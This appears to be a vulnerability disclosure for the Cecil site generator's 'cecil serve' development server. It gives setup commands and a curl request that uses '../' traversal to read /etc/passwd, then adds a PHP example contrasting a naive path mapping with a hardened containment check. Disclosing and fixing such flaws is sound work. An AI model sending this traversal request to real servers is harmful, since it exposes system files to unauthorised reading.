When a Cecil site is served by `cecil serve`, Relative Path Traversal is possible via the URI path.
Run the following commands:

```bash
mkdir cecil-path-traversal-poc
cd cecil-path-traversal-poc
curl -L https://cecil.app/cecil.phar -o cecil
chmod +x cecil
./cecil new:site -n
./cecil serve
```
Then run `curl --path-as-is http://localhost:8000/../../../../../../../../etc/passwd`.
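A containment check of the kind a development server's router needs in order to reject this request, shown beside a generic unsafe mapping. This is an added example, not Cecil's code; the function names and the temporary document root are hypothetical.

```php
<?php
// Added example, not Cecil's router. resolveNaive/resolveContained are hypothetical names.

// Generic unsafe pattern: the URI path is appended to the document root
// unchecked, so "../" segments walk out of it.
function resolveNaive(string $docroot, string $uriPath): string
{
    return $docroot . $uriPath;
}

// Hardened form: canonicalise first, then require the result to stay under the docroot.
function resolveContained(string $docroot, string $uriPath): ?string
{
    $root = realpath($docroot);
    if ($root === false) {
        return null;
    }
    // Decode once, as a server does before mapping the path to disk.
    $decoded = rawurldecode($uriPath);
    if (strpos($decoded, "\0") !== false) {
        return null;
    }
    // realpath() collapses "." and "..", resolves symlinks, and returns false if missing.
    $target = realpath($root . DIRECTORY_SEPARATOR . ltrim($decoded, '/\\'));
    if ($target === false) {
        return null;
    }
    // Compare against the root plus a trailing separator, so a sibling such as
    // "/srv/site-old" is not accepted for a docroot of "/srv/site".
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($target) ? $target : null;
}

// Constructed demo: a temporary docroot holding a single page.
$docroot = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'docroot-' . bin2hex(random_bytes(4));
mkdir($docroot);
file_put_contents($docroot . DIRECTORY_SEPARATOR . 'index.html', '<h1>ok</h1>');

// The second path is the one from the request above.
foreach (['/index.html', '/../../../../../../../../etc/passwd'] as $path) {
    $safe = resolveContained($docroot, $path);
    printf("%s\n  naive:     %s\n  contained: %s\n",
        $path, resolveNaive($docroot, $path), $safe ?? 'rejected (404)');
}
```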